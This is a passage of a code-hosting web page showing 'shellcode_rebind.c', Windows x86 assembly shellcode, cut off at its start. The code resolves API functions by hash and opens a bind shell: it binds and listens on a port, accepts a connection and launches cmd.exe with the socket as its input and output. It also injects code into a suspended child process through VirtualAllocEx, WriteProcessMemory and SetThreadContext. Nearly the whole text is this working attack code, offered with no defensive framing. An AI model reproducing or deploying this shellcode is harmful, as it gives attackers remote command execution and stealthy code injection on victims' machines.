📄 shellcode_rebind.c
字号:
pop ecx GetKFuncAddr: ; find functions from kernel32.dll call find_hashfunc_addr loop GetKFuncAddr call proc_fork ; process forking /* nop nop nop nop int 3 */ jmp locate_fork_func ; locate functions address in fork processfork_func: pop esi add esi, 5 ; jump call locate_addr instruction bytes lea edi, [esi+0x20] ; hash of ws2_32.dll push 3233h push 5F327377h ; ws2_32 push esp call dword ptr [esi+_LoadLibraryA] mov ebp, eax ; base address of ws2_32.dll push _Wnums pop ecx GetWFuncAddr: ; find functions from ws2_32.dll call find_hashfunc_addr loop GetWFuncAddr
add edi, 4 ; skip port variable // shellcode function start sub esp, 190h push esp push 101h call dword ptr [esi+_WSAStartup] ; WSAStartup(0x101, &WSADATA[0x190 bytes!]) push eax push eax push eax push eax push 1 push 2 call dword ptr [esi+_WSASocketA] ; WSASocketA(2,1,0,0,0,0) mov ebx, eax ; socket handle xor eax, eax
push eax
push eax ; sockaddr_in.sin_addr=0.0.0.0
mov dx, word ptr [esi+_port]
xchg dl, dh
ror edx, 10h
mov dx, 0x0002
push edx ; sockaddr_in.sin_port
mov edx, esp rebind: push ebx push edx push 16h push edx push ebx call dword ptr [esi+_bind] ; loop bind pop edx pop ebx test eax, eax jnz rebind push 1 push ebx call dword ptr [esi+_listen] push eax push eax push ebx call dword ptr [esi+_accept] mov ebx, eax ; ebx = socket push 646D63h ; "cmd" mov edx, esp sub esp, 54h mov edi, esp push 14h pop ecx xor eax, eax stack_zero: mov [edi+ecx*4], eax loop stack_zero mov byte ptr [edi+10h], 44h ; si.cb = sizeof(si) inc byte ptr [edi+3Ch] ; si.dwFlags = 0x100 inc byte ptr [edi+3Dh] ; dwFlags mov [edi+48h], ebx ; si.hStdInput = socket mov [edi+4Ch], ebx ; hStdOutput = socket mov [edi+50h], ebx ; hStdError = socket lea eax, [edi+10h] push edi push eax push ecx push ecx push ecx push 1 push ecx push ecx push edx ; "cmd" push ecx call dword ptr [esi+_CreateProcessA] xor eax, eax dec eax push eax call dword ptr [esi+_TerminateProcess]; from lsd's winasm paper and codeproc_fork: mov ebp, esp ; return address push 646D63h ; "cmd" mov edx, esp sub esp, 54h ; structure of pi(16) and si(68) mov edi, esp xor eax, eax push 14h pop ecx stack_zero1: mov [edi+ecx*4], eax loop stack_zero1 mov byte ptr [edi+10h], 44h inc byte ptr [edi+3Ch] inc byte ptr [edi+3Dh] mov [edi+48h], eax mov [edi+4Ch], eax mov [edi+50h], eax lea eax, [edi+10h] ; si push edi ; Pointer to PROCESS_INFORMATION structure. push eax ; Pointer to STARTUPINFO structure. push ecx ; Use parent's starting directory. push ecx ; Use parent's environment block. push 4 ; The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called. push ecx ; Set handle inheritance to FALSE. push ecx ; Thread handle not inheritable. push ecx ; Process handle not inheritable. push edx ; "cmd" push ecx ; No module name (use command line) call dword ptr [esi+_CreateProcessA] sub esp, 400h push 00010007h push esp push dword ptr [edi+0x04] ; thread handle call dword ptr [esi+_GetThreadContext] push 40h push 1000h push 5000h push 0 push dword ptr [edi] ; process handle call dword ptr [esi+_VirtualAllocEx] ; v=VirtualAllocEx(pi.hProcess,NULL,0x5000,MEM_COMMIT,PAGE_EXECUTE_READWRITE); //mov ebx, eax ; buf=allocated memory // CONTEXT structure: // +0x08c SegGs // +0x090 SegFs // +0x094 SegEs // +0x098 SegDs // +0x09c Edi // +0x0a0 Esi // +0x0a4 Ebx // +0x0a8 Edx // +0x0ac Ecx // +0x0b0 Eax // +0x0b4 Ebp // +0x0b8 Eip // +0x0bc SegCs // +0x0c0 EFlags // +0x0c4 Esp // +0x0c8 SegSs mov [esp+0B8h], eax ; ctx.Eip=buf_addr mov [esp+0B4h], eax ; ctx.Ebp=buf_addr mov ecx, [ebp] ; return address push 0 push 0800h push ecx push eax push dword ptr [edi] ; process handle call dword ptr [esi+_WriteProcessMemory] ; WriteProcessMemory(pi.hProcess,v,buf,sizeof(buf),NULL); push esp push dword ptr [edi+0x04] ; thread handle call dword ptr [esi+_SetThreadContext] ; SetThreadContext(pi.hThread,&ctx) push dword ptr [edi+0x04] ; thread handle call dword ptr [esi+_ResumeThread] ; ResumeThread(pi.hThread); xor eax, eax dec eax push eax call dword ptr [esi+_TerminateProcess] // shellcode function end find_hashfunc_addr: push ecx push esi mov esi, [ebp+3Ch] ; e_lfanew mov esi, [esi+ebp+78h] ; ExportDirectory RVA add esi, ebp ; rva2va push esi mov esi, [esi+20h] ; AddressOfNames RVA add esi, ebp ; rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, 7 ; hash add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] ; compare to hash jnz short find_start pop esi ; ExportDirectory mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA add ebx, ebp ; rva2va mov cx, [ebx+ecx*2] ; FunctionOrdinal mov ebx, [esi+1Ch] ; AddressOfFunctions RVA add ebx, ebp ; rva2va mov eax, [ebx+ecx*4] ; FunctionAddress RVA add eax, ebp ; rva2va stosd ; function address save to [edi] pop esi pop ecx retn locate_fork_func: call fork_func ; fork process locate functions address locate_addr: call func_startPROC_END //C macro to end proc }}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -